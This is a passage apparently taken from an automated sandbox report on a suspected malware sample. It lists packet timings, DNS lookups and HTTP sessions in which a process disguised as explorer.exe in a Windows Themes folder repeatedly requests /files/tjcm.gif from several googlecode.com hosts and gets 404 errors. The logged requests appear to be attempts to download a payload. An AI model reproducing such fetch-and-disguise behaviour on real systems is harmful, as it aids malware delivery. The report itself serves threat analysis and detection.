                                                                                                      Sep 30, 2024 16:17:03.594991922 CEST8049871108.177.15.82192.168.2.5
                                                                                                      Sep 30, 2024 16:17:03.595124960 CEST4987180192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:17:03.623405933 CEST4987180192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:17:03.628684998 CEST8049871108.177.15.82192.168.2.5
                                                                                                      Sep 30, 2024 16:17:04.312608957 CEST8049871108.177.15.82192.168.2.5
                                                                                                      Sep 30, 2024 16:17:04.312640905 CEST8049871108.177.15.82192.168.2.5
                                                                                                      Sep 30, 2024 16:17:04.312685013 CEST4987180192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:17:04.313113928 CEST4987180192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:17:04.313142061 CEST4987180192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:17:04.318286896 CEST8049871108.177.15.82192.168.2.5
                                                                                                      Sep 30, 2024 16:17:04.318362951 CEST4987180192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:17:04.706835985 CEST4987280192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:17:04.711922884 CEST8049872108.177.15.82192.168.2.5
                                                                                                      Sep 30, 2024 16:17:04.712024927 CEST4987280192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:17:04.738027096 CEST4987280192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:17:04.743213892 CEST8049872108.177.15.82192.168.2.5
                                                                                                      Sep 30, 2024 16:17:05.521945953 CEST8049872108.177.15.82192.168.2.5
                                                                                                      Sep 30, 2024 16:17:05.521970034 CEST8049872108.177.15.82192.168.2.5
                                                                                                      Sep 30, 2024 16:17:05.522089958 CEST4987280192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:17:05.522520065 CEST4987280192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:17:05.522546053 CEST4987280192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:17:05.853136063 CEST4987380192.168.2.574.125.206.82
                                                                                                      Sep 30, 2024 16:17:05.858813047 CEST804987374.125.206.82192.168.2.5
                                                                                                      Sep 30, 2024 16:17:05.858895063 CEST4987380192.168.2.574.125.206.82
                                                                                                      Sep 30, 2024 16:17:05.860512972 CEST4987380192.168.2.574.125.206.82
                                                                                                      Sep 30, 2024 16:17:05.865427017 CEST804987374.125.206.82192.168.2.5
                                                                                                      Sep 30, 2024 16:17:06.590768099 CEST804987374.125.206.82192.168.2.5
                                                                                                      Sep 30, 2024 16:17:06.590842009 CEST4987380192.168.2.574.125.206.82
                                                                                                      Sep 30, 2024 16:17:06.590847969 CEST804987374.125.206.82192.168.2.5
                                                                                                      Sep 30, 2024 16:17:06.590893984 CEST4987380192.168.2.574.125.206.82
                                                                                                      Sep 30, 2024 16:17:06.657777071 CEST4987380192.168.2.574.125.206.82
                                                                                                      Sep 30, 2024 16:17:06.657807112 CEST4987380192.168.2.574.125.206.82
                                                                                                      Sep 30, 2024 16:17:07.514369011 CEST4987480192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:17:07.519274950 CEST8049874108.177.15.82192.168.2.5
                                                                                                      Sep 30, 2024 16:17:07.519351959 CEST4987480192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:17:07.560050964 CEST4987480192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:17:07.565073013 CEST8049874108.177.15.82192.168.2.5
                                                                                                      Sep 30, 2024 16:17:08.228832006 CEST8049874108.177.15.82192.168.2.5
                                                                                                      Sep 30, 2024 16:17:08.228852987 CEST8049874108.177.15.82192.168.2.5
                                                                                                      Sep 30, 2024 16:17:08.228920937 CEST4987480192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:17:08.260529041 CEST4987480192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:17:08.260561943 CEST4987480192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:17:08.630480051 CEST4987580192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:17:08.635390997 CEST8049875108.177.15.82192.168.2.5
                                                                                                      Sep 30, 2024 16:17:08.635970116 CEST4987580192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:17:08.659248114 CEST4987580192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:17:08.664693117 CEST8049875108.177.15.82192.168.2.5
                                                                                                      Sep 30, 2024 16:17:09.367151022 CEST8049875108.177.15.82192.168.2.5
                                                                                                      Sep 30, 2024 16:17:09.367202044 CEST8049875108.177.15.82192.168.2.5
                                                                                                      Sep 30, 2024 16:17:09.367219925 CEST4987580192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:17:09.367250919 CEST4987580192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:17:09.407088041 CEST4987580192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:17:09.407196045 CEST4987580192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:17:09.412789106 CEST8049875108.177.15.82192.168.2.5
                                                                                                      Sep 30, 2024 16:17:09.412877083 CEST4987580192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:17:10.266587019 CEST4987680192.168.2.574.125.206.82
                                                                                                      Sep 30, 2024 16:17:10.271552086 CEST804987674.125.206.82192.168.2.5
                                                                                                      Sep 30, 2024 16:17:10.271625996 CEST4987680192.168.2.574.125.206.82
                                                                                                      Sep 30, 2024 16:17:10.283309937 CEST4987680192.168.2.574.125.206.82
                                                                                                      Sep 30, 2024 16:17:10.288937092 CEST804987674.125.206.82192.168.2.5
                                                                                                      Sep 30, 2024 16:17:11.006266117 CEST804987674.125.206.82192.168.2.5
                                                                                                      Sep 30, 2024 16:17:11.006294012 CEST804987674.125.206.82192.168.2.5
                                                                                                      Sep 30, 2024 16:17:11.006337881 CEST4987680192.168.2.574.125.206.82
                                                                                                      Sep 30, 2024 16:17:11.006378889 CEST4987680192.168.2.574.125.206.82
                                                                                                      Sep 30, 2024 16:17:11.021789074 CEST4987680192.168.2.574.125.206.82
                                                                                                      Sep 30, 2024 16:17:11.021856070 CEST4987680192.168.2.574.125.206.82
                                                                                                      Sep 30, 2024 16:17:11.404489994 CEST4987780192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:17:11.409502983 CEST8049877108.177.15.82192.168.2.5
                                                                                                      Sep 30, 2024 16:17:11.409626961 CEST4987780192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:17:11.445925951 CEST4987780192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:17:11.451109886 CEST8049877108.177.15.82192.168.2.5
                                                                                                      Sep 30, 2024 16:17:12.254956007 CEST8049877108.177.15.82192.168.2.5
                                                                                                      Sep 30, 2024 16:17:12.254977942 CEST8049877108.177.15.82192.168.2.5
                                                                                                      Sep 30, 2024 16:17:12.255037069 CEST4987780192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:17:12.255065918 CEST4987780192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:17:12.255129099 CEST8049877108.177.15.82192.168.2.5
                                                                                                      Sep 30, 2024 16:17:12.255340099 CEST4987780192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:17:12.339895964 CEST4987780192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:17:12.339895964 CEST4987780192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:17:13.151323080 CEST4987880192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:17:13.156282902 CEST8049878108.177.15.82192.168.2.5
                                                                                                      Sep 30, 2024 16:17:13.156374931 CEST4987880192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:17:13.236531019 CEST4987880192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:17:13.241372108 CEST8049878108.177.15.82192.168.2.5
                                                                                                      Sep 30, 2024 16:17:13.871529102 CEST8049878108.177.15.82192.168.2.5
                                                                                                      Sep 30, 2024 16:17:13.871557951 CEST8049878108.177.15.82192.168.2.5
                                                                                                      Sep 30, 2024 16:17:13.871596098 CEST4987880192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:17:13.871638060 CEST4987880192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:17:13.885216951 CEST4987880192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:17:13.885262966 CEST4987880192.168.2.5108.177.15.82
                                                                                                      Sep 30, 2024 16:17:14.255922079 CEST4987980192.168.2.574.125.206.82
                                                                                                      Sep 30, 2024 16:17:14.260910034 CEST804987974.125.206.82192.168.2.5
                                                                                                      Sep 30, 2024 16:17:14.260988951 CEST4987980192.168.2.574.125.206.82
                                                                                                      Sep 30, 2024 16:17:14.278146029 CEST4987980192.168.2.574.125.206.82
                                                                                                      Sep 30, 2024 16:17:14.283788919 CEST804987974.125.206.82192.168.2.5
                                                                                                      Sep 30, 2024 16:17:14.966336012 CEST804987974.125.206.82192.168.2.5
                                                                                                      Sep 30, 2024 16:17:14.966500998 CEST804987974.125.206.82192.168.2.5
                                                                                                      Sep 30, 2024 16:17:14.966617107 CEST4987980192.168.2.574.125.206.82
                                                                                                      Sep 30, 2024 16:17:14.969721079 CEST4987980192.168.2.574.125.206.82
                                                                                                      Sep 30, 2024 16:17:14.972646952 CEST4987980192.168.2.574.125.206.82
                                                                                                      Sep 30, 2024 16:17:14.974828959 CEST804987974.125.206.82192.168.2.5
                                                                                                      Sep 30, 2024 16:17:14.974900007 CEST4987980192.168.2.574.125.206.82
                                                                                                      TimestampSource PortDest PortSource IPDest IP
                                                                                                      Sep 30, 2024 16:13:23.032221079 CEST4927053192.168.2.51.1.1.1
                                                                                                      Sep 30, 2024 16:13:23.065578938 CEST53492701.1.1.1192.168.2.5
                                                                                                      Sep 30, 2024 16:13:25.187094927 CEST4973353192.168.2.51.1.1.1
                                                                                                      Sep 30, 2024 16:13:25.207915068 CEST53497331.1.1.1192.168.2.5
                                                                                                      Sep 30, 2024 16:13:27.515767097 CEST6415153192.168.2.51.1.1.1
                                                                                                      Sep 30, 2024 16:13:27.548388958 CEST53641511.1.1.1192.168.2.5
                                                                                                      TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                      Sep 30, 2024 16:13:23.032221079 CEST192.168.2.51.1.1.10xce6fStandard query (0)codecmd01.googlecode.comA (IP address)IN (0x0001)false
                                                                                                      Sep 30, 2024 16:13:25.187094927 CEST192.168.2.51.1.1.10x63e5Standard query (0)codecmd02.googlecode.comA (IP address)IN (0x0001)false
                                                                                                      Sep 30, 2024 16:13:27.515767097 CEST192.168.2.51.1.1.10x1d72Standard query (0)codecmd03.googlecode.comA (IP address)IN (0x0001)false
                                                                                                      TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                      Sep 30, 2024 16:13:23.065578938 CEST1.1.1.1192.168.2.50xce6fNo error (0)codecmd01.googlecode.comgooglecode.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                      Sep 30, 2024 16:13:23.065578938 CEST1.1.1.1192.168.2.50xce6fNo error (0)googlecode.l.googleusercontent.com74.125.206.82A (IP address)IN (0x0001)false
                                                                                                      Sep 30, 2024 16:13:25.207915068 CEST1.1.1.1192.168.2.50x63e5No error (0)codecmd02.googlecode.comgooglecode.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                      Sep 30, 2024 16:13:25.207915068 CEST1.1.1.1192.168.2.50x63e5No error (0)googlecode.l.googleusercontent.com108.177.15.82A (IP address)IN (0x0001)false
                                                                                                      Sep 30, 2024 16:13:27.548388958 CEST1.1.1.1192.168.2.50x1d72No error (0)codecmd03.googlecode.comgooglecode.l.googleusercontent.comCNAME (Canonical name)IN (0x0001)false
                                                                                                      Sep 30, 2024 16:13:27.548388958 CEST1.1.1.1192.168.2.50x1d72No error (0)googlecode.l.googleusercontent.com108.177.15.82A (IP address)IN (0x0001)false
                                                                                                      • codecmd01.googlecode.com
                                                                                                      • codecmd02.googlecode.com
                                                                                                      • codecmd03.googlecode.com
                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      0192.168.2.54970574.125.206.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:13:23.081593990 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd01.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:13:23.787466049 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:13:23 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:13:23.787488937 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      1192.168.2.549706108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:13:25.214160919 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd02.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:13:25.924947977 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:13:25 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:13:25.925023079 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      2192.168.2.549708108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:13:27.561769962 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd03.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:13:28.270539045 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:13:28 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:13:28.270546913 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      3192.168.2.54971474.125.206.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:13:29.558796883 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd01.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:13:30.285319090 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
                                                                                                      Content-Length: 1575
                                                                                                      Date: Mon, 30 Sep 2024 14:13:30 GMT
                                                                                                      Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 65 6e 3e 0a 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 75 74 66 2d 38 3e 0a 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 76 69 65 77 70 6f 72 74 20 63 6f 6e 74 65 6e 74 3d 22 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 6d 69 6e 69 6d 75 6d 2d 73 63 61 6c 65 3d 31 2c 20 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 22 3e 0a 20 20 3c 74 69 74 6c 65 3e 45 72 72 6f 72 20 34 30 34 20 28 4e 6f 74 20 46 6f 75 6e 64 29 21 21 31 3c 2f 74 69 74 6c 65 3e 0a 20 20 3c 73 74 79 6c 65 3e 0a 20 20 20 20 2a 7b 6d 61 72 67 69 6e 3a 30 3b 70 61 64 64 69 6e 67 3a 30 7d 68 74 6d 6c 2c 63 6f 64 65 7b 66 6f 6e 74 3a 31 35 70 78 2f 32 32 70 78 20 61 72 69 61 6c 2c 73 61 6e 73 2d 73 65 72 69 66 7d 68 74 6d 6c 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 23 66 66 66 3b 63 6f 6c 6f 72 3a 23 32 32 32 3b 70 61 64 64 69 6e 67 3a 31 35 70 78 7d 62 6f 64 79 7b 6d 61 72 67 69 6e 3a 37 25 20 61 75 74 6f 20 30 3b 6d 61 78 2d 77 69 64 74 68 3a 33 39 [TRUNCATED]
                                                                                                      Data Ascii: <!DOCTYPE html><html lang=en> <meta charset=utf-8> <meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"> <title>Error 404 (Not Found)!!1</title> <style> *{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{margin:7% auto 0;max-width:390px;min-height:180px;padding:30px 0 15px}* > body{background:url(//www.google.com/images/errors/robot.png) 100% 5px no-repeat;padding-right:205px}p{margin:11px 0 22px;overflow:hidden}ins{color:#777;text-decoration:none}a img{border:0}@media screen and (max-width:772px){body{background:none;margin-top:0;max-width:none;padding-right:0}}#logo{background:url(//www.google.com/images/branding/googlelogo/1x/googlelogo_color_150x54dp.png) no-repeat;margin-left:-5px}@media only screen and (min-resolution:192dpi){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat 0% 0%/100% 100%;-moz-border-image:url(//www.google.com/i [TRUNCATED]
                                                                                                      Sep 30, 2024 16:13:30.285345078 CEST494INData Raw: 20 6f 6e 6c 79 20 73 63 72 65 65 6e 20 61 6e 64 20 28 2d 77 65 62 6b 69 74 2d 6d 69 6e 2d 64 65 76 69 63 65 2d 70 69 78 65 6c 2d 72 61 74 69 6f 3a 32 29 7b 23 6c 6f 67 6f 7b 62 61 63 6b 67 72 6f 75 6e 64 3a 75 72 6c 28 2f 2f 77 77 77 2e 67 6f 6f
                                                                                                      Data Ascii: only screen and (-webkit-min-device-pixel-ratio:2){#logo{background:url(//www.google.com/images/branding/googlelogo/2x/googlelogo_color_150x54dp.png) no-repeat;-webkit-background-size:100% 100%}}#logo{display:inline-block;height:54px;width:15


                                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                      4192.168.2.549716108.177.15.8280320C:\Windows\Resources\Themes\explorer.exe
                                                                                                      TimestampBytes transferredDirectionData
                                                                                                      Sep 30, 2024 16:13:31.732999086 CEST215OUTGET /files/tjcm.gif HTTP/1.1
                                                                                                      Accept: */*
                                                                                                      Accept-Encoding: gzip, deflate
                                                                                                      User-Agent: Mozilla/5.0 (Windows NT 6.2; WOW64; Trident/7.0; rv:11.0) like Gecko
                                                                                                      Host: codecmd02.googlecode.com
                                                                                                      Connection: Keep-Alive
                                                                                                      Sep 30, 2024 16:13:32.442837000 CEST1236INHTTP/1.1 404 Not Found
                                                                                                      Content-Type: text/html; charset=UTF-8
                                                                                                      Referrer-Policy: no-referrer
